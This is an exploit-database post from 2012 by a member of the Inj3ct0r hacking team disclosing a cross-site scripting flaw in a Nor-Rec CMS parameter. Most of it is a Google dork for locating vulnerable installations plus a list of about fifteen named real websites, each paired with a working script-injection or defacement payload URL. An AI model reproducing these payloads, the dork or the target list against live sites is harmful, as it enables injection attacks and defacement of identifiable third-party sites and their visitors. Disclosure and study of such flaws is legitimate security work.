Home / exploits Nor-Rec Cross Site Scripting
Posted on 04 April 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> Nor-Rec - Persistent XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 [ www.thecybernuxbie.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By Nor-Rec: http://www.norrec.no/ - Google Dork: inurl:"/kategori.php?gruppe_id=" intext:"utviklet av Nor-Rec 2011" - Exploit Concept: http://lokalisasi/kategori.php?gruppe_id=[XSS] - Sample Web Persistent XSS Vulnerability: http://norrec.no/kategori.php?gruppe_id=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS] http://sommarlandcup.no/kategori.php?gruppe_id=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS] http://vtmk.net/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://seljordportalen.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://seljordogsogene.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://seljordkunstforening.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://seljordpersonal.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://seljordeiendom.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://lavine.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://alfj.as/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://telemarkgodslinjer.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://videoarkivet.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://lavine.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] http://sterkenils.no/kategori.php?gruppe_id=<script>alert(31337);</script> <:- [XSS] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################
